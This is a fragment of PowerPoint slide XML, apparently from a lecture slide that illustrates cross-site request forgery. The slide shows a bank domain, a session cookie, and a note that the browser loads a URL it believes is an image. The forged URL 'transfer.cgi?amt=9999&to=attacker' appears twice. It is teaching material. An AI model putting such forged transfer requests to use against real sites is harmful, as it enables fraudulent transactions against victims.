              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>HabibB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>ank.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79894" name="object 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8CF37B1-6282-9441-BF17-65652D6A3417}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="780000">
            <a:off x="2600325" y="5648325"/>
            <a:ext cx="4976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075"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>transfer.cgi?amt=9999&amp;to=attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F77CDA00-FBE9-0A49-B4A5-139A8967A652}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362200" y="4648200"/>
            <a:ext cx="5251450"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9896" name="object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACB7B50B-773E-9B47-8720-64B013FC152E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="541338" y="4552950"/>
            <a:ext cx="1114425" cy="55245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0" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70DBC3B2-E21C-9D4B-9764-9A6598CBEE07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696913" y="4191000"/>
            <a:ext cx="1055687" cy="779463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1293691">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12682">
              <a:spcBef>
                <a:spcPts val="820"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:endParaRPr sz="1900" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79898" name="object 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9495BDA2-AF00-7B46-993B-1E1AA79D3541}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="3844925"/>
            <a:ext cx="1411288" cy="6032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9899" name="object 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60C88DC7-E7B2-E04B-A1B6-096A84D1F590}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="38100" y="3895725"/>
            <a:ext cx="1309688" cy="5016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79900" name="object 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD986DFA-FB94-6747-A0DD-759AB4091815}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="38100" y="3895725"/>
            <a:ext cx="1309688" cy="501650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1195575 w 1309370"/>
              <a:gd name="T1" fmla="*/ 0 h 501650"/>
              <a:gd name="T2" fmla="*/ 120719 w 1309370"/>
              <a:gd name="T3" fmla="*/ 0 h 501650"/>
              <a:gd name="T4" fmla="*/ 73736 w 1309370"/>
              <a:gd name="T5" fmla="*/ 9436 h 501650"/>
              <a:gd name="T6" fmla="*/ 35369 w 1309370"/>
              <a:gd name="T7" fmla="*/ 35169 h 501650"/>
              <a:gd name="T8" fmla="*/ 9480 w 1309370"/>
              <a:gd name="T9" fmla="*/ 73337 h 501650"/>
              <a:gd name="T10" fmla="*/ 0 w 1309370"/>
              <a:gd name="T11" fmla="*/ 120078 h 501650"/>
              <a:gd name="T12" fmla="*/ 0 w 1309370"/>
              <a:gd name="T13" fmla="*/ 381076 h 501650"/>
              <a:gd name="T14" fmla="*/ 9480 w 1309370"/>
              <a:gd name="T15" fmla="*/ 427816 h 501650"/>
              <a:gd name="T16" fmla="*/ 35369 w 1309370"/>
              <a:gd name="T17" fmla="*/ 465985 h 501650"/>
              <a:gd name="T18" fmla="*/ 73736 w 1309370"/>
              <a:gd name="T19" fmla="*/ 491718 h 501650"/>
              <a:gd name="T20" fmla="*/ 120719 w 1309370"/>
              <a:gd name="T21" fmla="*/ 501154 h 501650"/>
              <a:gd name="T22" fmla="*/ 1195575 w 1309370"/>
              <a:gd name="T23" fmla="*/ 501154 h 501650"/>
              <a:gd name="T24" fmla="*/ 1242573 w 1309370"/>
              <a:gd name="T25" fmla="*/ 491718 h 501650"/>
              <a:gd name="T26" fmla="*/ 1280951 w 1309370"/>
              <a:gd name="T27" fmla="*/ 465985 h 501650"/>
              <a:gd name="T28" fmla="*/ 1306823 w 1309370"/>
              <a:gd name="T29" fmla="*/ 427816 h 501650"/>
              <a:gd name="T30" fmla="*/ 1316309 w 1309370"/>
              <a:gd name="T31" fmla="*/ 381076 h 501650"/>
              <a:gd name="T32" fmla="*/ 1316309 w 1309370"/>
              <a:gd name="T33" fmla="*/ 120078 h 501650"/>
              <a:gd name="T34" fmla="*/ 1306823 w 1309370"/>
              <a:gd name="T35" fmla="*/ 73337 h 501650"/>
              <a:gd name="T36" fmla="*/ 1280951 w 1309370"/>
              <a:gd name="T37" fmla="*/ 35169 h 501650"/>
              <a:gd name="T38" fmla="*/ 1242573 w 1309370"/>
              <a:gd name="T39" fmla="*/ 9436 h 501650"/>
              <a:gd name="T40" fmla="*/ 1195575 w 1309370"/>
              <a:gd name="T41" fmla="*/ 0 h 501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9370" h="501650">
                <a:moveTo>
                  <a:pt x="1189205" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120081" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73340" y="9436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35171" y="35169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9436" y="73337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="381076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9436" y="427816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35171" y="465985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73340" y="491718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120081" y="501154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1189205" y="501154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1235953" y="491718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1274125" y="465985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299860" y="427816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1309296" y="381076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1309296" y="120078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299860" y="73337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1274125" y="35169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1235953" y="9436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1189205"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9901" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7C492DB-CAD3-4345-A04F-24F3569ED036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="163513" y="4000500"/>
            <a:ext cx="10620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700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79902" name="object 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D54CCA28-989B-964E-A7B3-F55096D6D7CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="223838" y="4402138"/>
            <a:ext cx="95250" cy="361950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 109546 w 94614"/>
              <a:gd name="T1" fmla="*/ 361732 h 361950"/>
              <a:gd name="T2" fmla="*/ 50622 w 94614"/>
              <a:gd name="T3" fmla="*/ 310812 h 361950"/>
              <a:gd name="T4" fmla="*/ 29716 w 94614"/>
              <a:gd name="T5" fmla="*/ 270240 h 361950"/>
              <a:gd name="T6" fmla="*/ 14314 w 94614"/>
              <a:gd name="T7" fmla="*/ 225176 h 361950"/>
              <a:gd name="T8" fmla="*/ 4408 w 94614"/>
              <a:gd name="T9" fmla="*/ 175621 h 361950"/>
              <a:gd name="T10" fmla="*/ 0 w 94614"/>
              <a:gd name="T11" fmla="*/ 121573 h 361950"/>
              <a:gd name="T12" fmla="*/ 1084 w 94614"/>
              <a:gd name="T13" fmla="*/ 63033 h 361950"/>
              <a:gd name="T14" fmla="*/ 7664 w 94614"/>
              <a:gd name="T15" fmla="*/ 0 h 3619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4614" h="361950">
                <a:moveTo>
                  <a:pt x="94534" y="361732"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="43681" y="310812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25644" y="270240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12352" y="225176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3804" y="175621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="121573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="936" y="63033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6614"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903" name="object 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{629067A5-3E77-7046-B22E-F4DEA461E129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="230188" y="4633913"/>
            <a:ext cx="290512" cy="234950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 124019 w 290195"/>
              <a:gd name="T1" fmla="*/ 0 h 235585"/>
              <a:gd name="T2" fmla="*/ 0 w 290195"/>
              <a:gd name="T3" fmla="*/ 215840 h 235585"/>
              <a:gd name="T4" fmla="*/ 296625 w 290195"/>
              <a:gd name="T5" fmla="*/ 222015 h 235585"/>
              <a:gd name="T6" fmla="*/ 124019 w 290195"/>
              <a:gd name="T7" fmla="*/ 0 h 2355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195" h="235585">
                <a:moveTo>
                  <a:pt x="121076" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="229044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289585" y="235597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1210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184E04F-B62D-2E42-BA52-B8243E6E3A8E}"/>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80899" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD8EBCBA-0794-F643-B887-D99734275F52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1289050" y="2955925"/>
            <a:ext cx="1466850" cy="15779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0900" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22CD728C-373C-7A46-B199-6F0540C57BEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1317625" y="2965450"/>
            <a:ext cx="1408113" cy="15176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0901" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C06A317-CEC8-F44F-993F-14BD08CEA2D4}"/>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0F1DBCCD-DF61-5449-A3E1-7006E68E27B0}"/>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3956178F-146B-C74B-8AD0-64D6DA08ABB6}"/>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80904" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77361828-2B83-5B40-81BD-2013D679001C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7807325" y="1857375"/>
            <a:ext cx="2060575" cy="9413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0905" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B26FF597-346E-F44E-9D2D-DB2B36E48F13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7837488" y="1866900"/>
            <a:ext cx="2000250" cy="9318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F00F874F-FBB2-D84F-B260-6105AFCD1358}"/>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0B4D8F57-F0A9-5244-AF58-E57C827F10D3}"/>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AA1F334-18FE-BB4B-888C-78CBE3212DC0}"/>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FB94CF3A-B467-974F-AC32-C1FA17117B4B}"/>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3F8FDC04-3B68-FD40-95D8-E423BB0107C7}"/>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80911" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2B7C3B8-6366-2746-BF22-D1A8126004E3}"/>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
        <p:nvSpPr>
          <p:cNvPr id="80912" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D5A7A2-3427-0E44-9110-3672CE1BA62C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="5784850"/>
            <a:ext cx="37496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b="1">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Browser automatically  visits the URL to obtain  what it believes will be  an image</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2600">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80913" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C82AD4E3-6735-C54E-B020-24FEC1497B5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7773988" y="4994275"/>
            <a:ext cx="2132012" cy="16954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0914" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9608B11-C196-024D-9C42-DEC98C32C769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7791450" y="5029200"/>
            <a:ext cx="2051050" cy="16097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0915" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{313FBDE0-FA7D-AD4E-A613-C9B11D30219B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7791450" y="50292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0916" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1091ECC8-6BFA-DF49-90CF-C37CC88726C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7970838" y="55768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sp>
        <p:nvSpPr>
          <p:cNvPr id="80917" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CE8730C-A8F8-BE43-9054-783703F944F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="780000">
            <a:off x="3419475" y="5384800"/>
            <a:ext cx="380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138"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>HabibB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>ank.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80918" name="object 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB8887C9-959E-C84F-BB46-1E5E30CAC0DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="780000">
            <a:off x="2600325" y="5648325"/>
            <a:ext cx="4976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075"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>transfer.cgi?amt=9999&amp;to=attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78057A7B-CC48-4547-A045-FB3080909580}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362200" y="4648200"/>
            <a:ext cx="5251450"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0920" name="object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F80FC2A-237C-694E-A269-B69719DB1A17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="541338" y="4552950"/>
            <a:ext cx="1114425" cy="5524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0" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{282C1012-847B-2144-9224-2FF155809343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696913" y="4191000"/>
            <a:ext cx="1055687" cy="779463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1293691">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12682">
              <a:spcBef>
                <a:spcPts val="820"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:endParaRPr sz="1900" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80922" name="object 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B110F4F-9468-9D4E-981A-0774D15E9C37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
